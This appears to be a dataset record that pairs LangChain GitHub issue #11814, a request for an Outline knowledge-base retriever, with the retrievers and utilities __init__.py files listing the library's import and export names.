### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/retrievers/__init__.py
"""**Retriever** class returns Documents given a text **query**. It is more general than a vector store. A retriever does not need to be able to store documents, only to return (or retrieve) it. Vector stores can be used as the backbone of a retriever, but there are other types of retrievers as well. **Class hierarchy:** .. code-block:: BaseRetriever --> <name>Retriever # Examples: ArxivRetriever, MergerRetriever **Main helpers:** .. code-block:: Document, Serializable, Callbacks, CallbackManagerForRetrieverRun, AsyncCallbackManagerForRetrieverRun """ from langchain.retrievers.arcee import ArceeRetriever from langchain.retrievers.arxiv import ArxivRetriever from langchain.retrievers.azure_cognitive_search import AzureCognitiveSearchRetriever from langchain.retrievers.bm25 import BM25Retriever from langchain.retrievers.chaindesk import ChaindeskRetriever from langchain.retrievers.chatgpt_plugin_retriever import ChatGPTPluginRetriever from langchain.retrievers.cohere_rag_retriever import CohereRagRetriever from langchain.retrievers.contextual_compression import ContextualCompressionRetriever from langchain.retrievers.docarray import DocArrayRetriever from langchain.retrievers.elastic_search_bm25 import ElasticSearchBM25Retriever from langchain.retrievers.embedchain import EmbedchainRetriever from langchain.retrievers.ensemble import EnsembleRetriever from langchain.retrievers.google_cloud_documentai_warehouse import ( GoogleDocumentAIWarehouseRetriever, ) from langchain.retrievers.google_vertex_ai_search import ( GoogleCloudEnterpriseSearchRetriever, GoogleVertexAIMultiTurnSearchRetriever, GoogleVertexAISearchRetriever, ) from langchain.retrievers.kay import KayAiRetriever from langchain.retrievers.kendra import AmazonKendraRetriever from langchain.retrievers.knn import KNNRetriever from langchain.retrievers.llama_index import ( LlamaIndexGraphRetriever, LlamaIndexRetriever, ) from langchain.retrievers.merger_retriever import MergerRetriever from langchain.retrievers.metal import MetalRetriever from langchain.retrievers.milvus import MilvusRetriever from langchain.retrievers.multi_query import MultiQueryRetriever from langchain.retrievers.multi_vector import MultiVectorRetriever from langchain.retrievers.parent_document_retriever import ParentDocumentRetriever from langchain.retrievers.pinecone_hybrid_search import PineconeHybridSearchRetriever from langchain.retrievers.pubmed import PubMedRetriever from langchain.retrievers.re_phraser import RePhraseQueryRetriever from langchain.retrievers.remote_retriever import RemoteLangChainRetriever from langchain.retrievers.self_query.base import SelfQueryRetriever from langchain.retrievers.svm import SVMRetriever from langchain.retrievers.tavily_search_api import TavilySearchAPIRetriever from langchain.retrievers.tfidf import TFIDFRetriever from langchain.retrievers.time_weighted_retriever import ( TimeWeightedVectorStoreRetriever, ) from langchain.retrievers.vespa_retriever import VespaRetriever from langchain.retrievers.weaviate_hybrid_search import WeaviateHybridSearchRetriever from langchain.retrievers.web_research import WebResearchRetriever from langchain.retrievers.wikipedia import WikipediaRetriever from langchain.retrievers.zep import ZepRetriever from langchain.retrievers.zilliz import ZillizRetriever __all__ = [ "AmazonKendraRetriever", "ArceeRetriever", "ArxivRetriever", "AzureCognitiveSearchRetriever", "ChatGPTPluginRetriever", "ContextualCompressionRetriever", "ChaindeskRetriever", "CohereRagRetriever", "ElasticSearchBM25Retriever", "EmbedchainRetriever", "GoogleDocumentAIWarehouseRetriever", "GoogleCloudEnterpriseSearchRetriever", "GoogleVertexAIMultiTurnSearchRetriever", "GoogleVertexAISearchRetriever", "KayAiRetriever", "KNNRetriever", "LlamaIndexGraphRetriever", "LlamaIndexRetriever", "MergerRetriever", "MetalRetriever", "MilvusRetriever", "MultiQueryRetriever", "PineconeHybridSearchRetriever", "PubMedRetriever", "RemoteLangChainRetriever", "SVMRetriever", "SelfQueryRetriever", "TavilySearchAPIRetriever", "TFIDFRetriever", "BM25Retriever", "TimeWeightedVectorStoreRetriever", "VespaRetriever", "WeaviateHybridSearchRetriever", "WikipediaRetriever", "ZepRetriever", "ZillizRetriever", "DocArrayRetriever", "RePhraseQueryRetriever", "WebResearchRetriever", "EnsembleRetriever", "ParentDocumentRetriever", "MultiVectorRetriever", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/retrievers/outline.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/utilities/__init__.py
"""**Utilities** are the integrations with third-part systems and packages. Other LangChain classes use **Utilities** to interact with third-part systems and packages. """ from typing import Any from langchain.utilities.requests import Requests, RequestsWrapper, TextRequestsWrapper def _import_alpha_vantage() -> Any: from langchain.utilities.alpha_vantage import AlphaVantageAPIWrapper return AlphaVantageAPIWrapper def _import_apify() -> Any: from langchain.utilities.apify import ApifyWrapper return ApifyWrapper def _import_arcee() -> Any: from langchain.utilities.arcee import ArceeWrapper return ArceeWrapper def _import_arxiv() -> Any: from langchain.utilities.arxiv import ArxivAPIWrapper return ArxivAPIWrapper def _import_awslambda() -> Any: from langchain.utilities.awslambda import LambdaWrapper return LambdaWrapper def _import_bibtex() -> Any: from langchain.utilities.bibtex import BibtexparserWrapper return BibtexparserWrapper def _import_bing_search() -> Any: from langchain.utilities.bing_search import BingSearchAPIWrapper return BingSearchAPIWrapper def _import_brave_search() -> Any: from langchain.utilities.brave_search import BraveSearchWrapper return BraveSearchWrapper def _import_duckduckgo_search() -> Any: from langchain.utilities.duckduckgo_search import DuckDuckGoSearchAPIWrapper return DuckDuckGoSearchAPIWrapper def _import_golden_query() -> Any: from langchain.utilities.golden_query import GoldenQueryAPIWrapper return GoldenQueryAPIWrapper def _import_google_places_api() -> Any: from langchain.utilities.google_places_api import GooglePlacesAPIWrapper return GooglePlacesAPIWrapper def _import_google_scholar() -> Any: from langchain.utilities.google_scholar import GoogleScholarAPIWrapper return GoogleScholarAPIWrapper def _import_google_search() -> Any: from langchain.utilities.google_search import GoogleSearchAPIWrapper return GoogleSearchAPIWrapper def _import_google_serper() -> Any: from langchain.utilities.google_serper import GoogleSerperAPIWrapper return GoogleSerperAPIWrapper def _import_graphql() -> Any: from langchain.utilities.graphql import GraphQLAPIWrapper return GraphQLAPIWrapper def _import_jira() -> Any: from langchain.utilities.jira import JiraAPIWrapper return JiraAPIWrapper def _import_max_compute() -> Any: from langchain.utilities.max_compute import MaxComputeAPIWrapper return MaxComputeAPIWrapper def _import_metaphor_search() -> Any: from langchain.utilities.metaphor_search import MetaphorSearchAPIWrapper return MetaphorSearchAPIWrapper def _import_openweathermap() -> Any: from langchain.utilities.openweathermap import OpenWeatherMapAPIWrapper return OpenWeatherMapAPIWrapper def _import_portkey() -> Any: from langchain.utilities.portkey import Portkey return Portkey def _import_powerbi() -> Any: from langchain.utilities.powerbi import PowerBIDataset return PowerBIDataset def _import_pubmed() -> Any: from langchain.utilities.pubmed import PubMedAPIWrapper return PubMedAPIWrapper def _import_python() -> Any: from langchain.utilities.python import PythonREPL return PythonREPL def _import_scenexplain() -> Any: from langchain.utilities.scenexplain import SceneXplainAPIWrapper return SceneXplainAPIWrapper def _import_searchapi() -> Any: from langchain.utilities.searchapi import SearchApiAPIWrapper return SearchApiAPIWrapper def _import_searx_search() -> Any: from langchain.utilities.searx_search import SearxSearchWrapper return SearxSearchWrapper def _import_serpapi() -> Any: from langchain.utilities.serpapi import SerpAPIWrapper return SerpAPIWrapper def _import_spark_sql() -> Any: from langchain.utilities.spark_sql import SparkSQL return SparkSQL def _import_sql_database() -> Any: from langchain.utilities.sql_database import SQLDatabase return SQLDatabase def _import_tensorflow_datasets() -> Any: from langchain.utilities.tensorflow_datasets import TensorflowDatasets return TensorflowDatasets def _import_twilio() -> Any: from langchain.utilities.twilio import TwilioAPIWrapper return TwilioAPIWrapper def _import_wikipedia() -> Any: from langchain.utilities.wikipedia import WikipediaAPIWrapper return WikipediaAPIWrapper def _import_wolfram_alpha() -> Any: from langchain.utilities.wolfram_alpha import WolframAlphaAPIWrapper return WolframAlphaAPIWrapper def _import_zapier() -> Any: from langchain.utilities.zapier import ZapierNLAWrapper return ZapierNLAWrapper def __getattr__(name: str) -> Any: if name == "AlphaVantageAPIWrapper": return _import_alpha_vantage() elif name == "ApifyWrapper": return _import_apify() elif name == "ArceeWrapper": return _import_arcee() elif name == "ArxivAPIWrapper": return _import_arxiv() elif name == "LambdaWrapper": return _import_awslambda() elif name == "BibtexparserWrapper": return _import_bibtex() elif name == "BingSearchAPIWrapper": return _import_bing_search() elif name == "BraveSearchWrapper": return _import_brave_search() elif name == "DuckDuckGoSearchAPIWrapper": return _import_duckduckgo_search() elif name == "GoldenQueryAPIWrapper": return _import_golden_query() elif name == "GoogleScholarAPIWrapper": return _import_google_scholar() elif name == "GooglePlacesAPIWrapper": return _import_google_places_api() elif name == "GoogleSearchAPIWrapper": return _import_google_search() elif name == "GoogleSerperAPIWrapper": return _import_google_serper() elif name == "GraphQLAPIWrapper": return _import_graphql() elif name == "JiraAPIWrapper": return _import_jira() elif name == "MaxComputeAPIWrapper": return _import_max_compute() elif name == "MetaphorSearchAPIWrapper": return _import_metaphor_search() elif name == "OpenWeatherMapAPIWrapper": return _import_openweathermap() elif name == "Portkey": return _import_portkey() elif name == "PowerBIDataset": return _import_powerbi() elif name == "PubMedAPIWrapper": return _import_pubmed() elif name == "PythonREPL": return _import_python() elif name == "SceneXplainAPIWrapper": return _import_scenexplain() elif name == "SearchApiAPIWrapper": return _import_searchapi() elif name == "SearxSearchWrapper": return _import_searx_search() elif name == "SerpAPIWrapper": return _import_serpapi() elif name == "SparkSQL": return _import_spark_sql() elif name == "SQLDatabase": return _import_sql_database() elif name == "TensorflowDatasets": return _import_tensorflow_datasets() elif name == "TwilioAPIWrapper": return _import_twilio() elif name == "WikipediaAPIWrapper": return _import_wikipedia() elif name == "WolframAlphaAPIWrapper": return _import_wolfram_alpha() elif name == "ZapierNLAWrapper": return _import_zapier() else: raise AttributeError(f"Could not find: {name}") __all__ = [ "AlphaVantageAPIWrapper", "ApifyWrapper", "ArceeWrapper", "ArxivAPIWrapper", "BibtexparserWrapper", "BingSearchAPIWrapper", "BraveSearchWrapper", "DuckDuckGoSearchAPIWrapper", "GoldenQueryAPIWrapper", "GooglePlacesAPIWrapper", "GoogleScholarAPIWrapper", "GoogleSearchAPIWrapper", "GoogleSerperAPIWrapper", "GraphQLAPIWrapper", "JiraAPIWrapper", "LambdaWrapper", "MaxComputeAPIWrapper", "MetaphorSearchAPIWrapper", "OpenWeatherMapAPIWrapper", "Portkey", "PowerBIDataset", "PubMedAPIWrapper", "PythonREPL", "Requests", "RequestsWrapper", "SQLDatabase", "SceneXplainAPIWrapper", "SearchApiAPIWrapper", "SearxSearchWrapper", "SerpAPIWrapper", "SparkSQL", "TensorflowDatasets", "TextRequestsWrapper", "TwilioAPIWrapper", "WikipediaAPIWrapper", "WolframAlphaAPIWrapper", "ZapierNLAWrapper", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
libs/langchain/langchain/utilities/outline.py